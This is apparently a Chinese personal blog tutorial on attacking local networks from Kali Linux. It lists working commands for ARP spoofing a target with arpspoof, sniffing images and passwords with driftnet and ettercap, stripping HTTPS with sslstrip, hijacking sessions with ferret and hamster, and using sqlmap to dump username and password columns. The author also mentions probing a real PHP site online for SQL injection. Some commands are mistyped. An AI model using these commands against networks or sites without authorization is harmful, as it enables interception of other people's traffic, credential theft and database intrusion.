1. 程式人生 > >kali 局域網嗅探

kali 局域網嗅探

會話 install aid shel 嗅探 別人 net eve start

1、局域網圖片嗅探

工具 arpspoof

arpspoof -i eth0 -t 192.1681.10(網卡 目標地址) 192.168.1.1 局域網網關,如果在Windows中可以使用局域網掃描工具 Advanced ip Scanner

linux中 掃描局域網在線的主機 fping -asg 192.168.1.0/24

技術分享圖片
欺騙的同時不能是對方斷網,使用流量轉發 echo 1 >/proc/sys/net/ipv4/ip_forward

檢查是否成功執行 cat proc/sys/sys/net/ipv4/ip_forward
獲取本機網卡的圖片 driftnet -i eth0

技術分享圖片

2、密碼嗅探 <http>

先使用欺騙命令 arpspoof

ettercap -Tq - i eth0

技術分享圖片

3、ssh遠程連接操作 鏈接kali shell模式註銷

ctrl +Alt +F1 切換到 命令行模式

使用命令 /etc/init.d/ssh start

使用Xshell 鏈接kali ip

4、抓包https流量

首先編輯 vim /etc/ettercap/etter.conf 修改 ****linux ** 取消 #

開啟 sslstrip -a -f -k

開啟欺騙 arpspoof 同時轉發流量

在https 網址上進行登陸 抓取流量

技術分享圖片

5、會話劫持登陸已經被別人登陸的網站

快速添加之前使用的命令 ! + 部分命令 就會補全

先使用arpspoof 欺騙 同時流量轉發

使用 wireshark 流量抓包工具

使用 ferret 重新生成抓包的工具

ferret -r j加上 抓取的流量包 會生成一個 txt文件

使用 hamster -h打開一個瀏覽器 -----》 設置代理和端口

或者不適用欺騙,直接使用 ferret -i eth0 然後使用 hamster 瀏覽網頁

另外基於界面的軟件 cookieCadger

6、sqlmap 對asp網站的檢測

sqlmap -u "www.baidu.com.id=2"

sqlmap -u "www.baidu.com.id=2" --tables

sqlmap -u "www.baidu.com.id=2" --columns -T "user"

sqlmap -u "www.baidu.com.id=2" --dump -C "username ,password" -T "user"

cookie使用 sqlmap -u “ www.baidu.com.php.id=2” --cookie "id=23" --level=2

7、sqlmap 對php網站的檢測

sqlmap -u “ www.baidu.com.php.id=2” --is-dba 檢測是否是dba 形式 (可以將文件寫入目錄)

sqlmap -u “ www.baidu.com.php.id=2” --dbs (列出所有的數據庫)

sqlmap -u “ www.baidu.com.php.id=2” --current-db (猜測當前的數據庫)

sqlmap -u “ www.baidu.com.php.id=2” --tables -D "admin" (根據admin數據庫猜測表名)

sqlmap -u “ www.baidu.com.php.id=2” --columns -T "pss" -D "admin"

sqlmap -u “ www.baidu.com.php.id=2” --dump -C "username,password " -T "pss" -D "admin"

8、實例檢測

下面是我檢測的一個網上的PHP的網站 存在SQL註入的漏洞

技術分享圖片

9、Metasploit

msfconsole

這一節我之前的微博已經寫過很多,不過還沒喲整理,想著抽空整理一遍

10、流量分析工具 nload

附: 卸載之前暗轉的軟件 apt-get remove

修復沒有成功安裝的軟件 apt --fix-broken install

技術分享圖片

11、

kali 局域網嗅探